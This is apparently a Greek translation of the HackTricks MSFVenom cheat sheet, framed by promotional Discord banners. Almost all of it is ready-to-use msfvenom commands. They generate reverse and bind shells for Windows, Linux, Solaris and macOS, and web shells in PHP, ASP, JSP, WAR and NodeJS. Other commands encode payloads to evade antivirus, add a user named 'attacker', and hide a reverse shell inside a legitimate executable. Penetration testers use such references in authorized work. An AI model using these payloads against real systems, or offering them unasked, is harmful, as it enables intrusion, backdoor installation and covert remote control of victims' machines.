MSFVenom - CheatSheet

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εγγραφείτε στον διακομιστή HackenProof Discord για να επικοινωνήσετε με έμπειρους χάκερ και κυνηγούς ευρημάτων ασφαλείας!

Εισαγωγή στο Χάκινγκ Ασχοληθείτε με περιεχόμενο που εξερευνά τον ενθουσιασμό και τις προκλήσεις του χάκινγκ

Ειδήσεις Χάκινγκ σε Πραγματικό Χρόνο Μείνετε ενημερωμένοι με τον γρήγορο ρυθμό του κόσμου του χάκινγκ μέσω ειδήσεων και αναλύσεων σε πραγματικό χρόνο

Τελευταίες Ανακοινώσεις Μείνετε ενημερωμένοι με τις νεότερες ανταμοιβές ευρημάτων που ξεκινούν και τις κρίσιμες ενημερώσεις των πλατφορμών

Εγγραφείτε στο Discord και αρχίστε να συνεργάζεστε με τους κορυφαίους χάκερ σήμερα!


Βασική msfvenom

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

Μπορείτε επίσης να χρησιμοποιήσετε το -a για να καθορίσετε την αρχιτεκτονική ή την --platform

msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Κοινοί παράμετροι κατά τη δημιουργία ενός shellcode

When creating a shellcode, there are several common parameters that can be used to customize its behavior. These parameters include:

  • LHOST: Η διεύθυνση IP του επιτιθέμενου συστήματος, στο οποίο θα σταλεί ο shellcode.

  • LPORT: Ο αριθμός θύρας στον οποίο θα ακούει ο shellcode για συνδέσεις.

  • EXITFUNC: Η μέθοδος που θα χρησιμοποιηθεί για την έξοδο από το πρόγραμμα μετά την εκτέλεση του shellcode.

  • Encoder: Ο κωδικοποτητής που θα χρησιμοποιηθεί για την απόκρυψη του shellcode.

  • Badchars: Οι χαρακτήρες που πρέπει να αποφευχθούν στο shellcode, εάν υπάρχουν.

  • Platform: Η πλατφόρμα στην οποία θα εκτελεστεί το shellcode (π.χ. Windows, Linux, macOS).

  • Arch: Η αρχιτεκτονική του συστήματος στο οποίο θα εκτελεστεί το shellcode (π.χ. x86, x64, ARM).

Αυτές οι παράμετροι μπορούν να προσαρμοστούν ανάλογα με τις ανάγκες της επίθεσης και το περιβάλλον στο οποίο θα εκτελεστεί το shellcode.

-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Windows

Αντίστροφο Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Συνδεδεμένη θύρα (Bind Shell)

msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe

Δημιουργία Χρήστη

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

CMD Shell

msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe

Κωδικοποιητής

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe

Ενσωματωμένο μέσα σε εκτελέσιμο

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe

Πληρωμές Linux

Αντίστροφο κέλυφος

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Συνδεδεμένη θύρα (Bind Shell)

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

MAC Παραμέτροι

Αντίστροφο Shell:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho

Συνδεδεμένη θύρα

msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho

Πλατφόρμες βασισμένες στον ιστό

PHP

Αντίστροφη κέλυφος

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP/x

Αντίστροφο κέλυφος

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx

JSP

Αντίστροφο κέλυφος

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp

WAR

Αντίστροφος Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)

Φορτία γλωσσών σεναρίου

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

Συμμετέχετε στον διακομιστή HackenProof Discord για να επικοινωνήσετε με έμπειρους χάκερ και κυνηγούς ευρημάτων ασφαλείας!

Εισαγωγή στο Hacking Ασχοληθείτε με περιεχόμενο που εξερευνά τον ενθουσιασμό και τις προκλήσεις του χάκινγκ.

Ειδήσεις Χάκινγκ σε Πραγματικό Χρόνο Μείνετε ενημερωμένοι με τον γρήγορο ρυθμό του κόσμου του χάκινγκ μέσω ειδήσεων και αναλύσεων σε πραγματικό χρόνο.

Τελευταίες Ανακοινώσεις Μείνετε ενημερωμένοι με τις νεότερες ευκαιρίες ευρήματος ασφαλείας και τις κρίσιμες ενημερώσεις των πλατφορμών.

Συμμετέχετε στο Discord και αρχίστε να συνεργάζεστε με τους κορυφαίους χάκερ σήμερα!

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated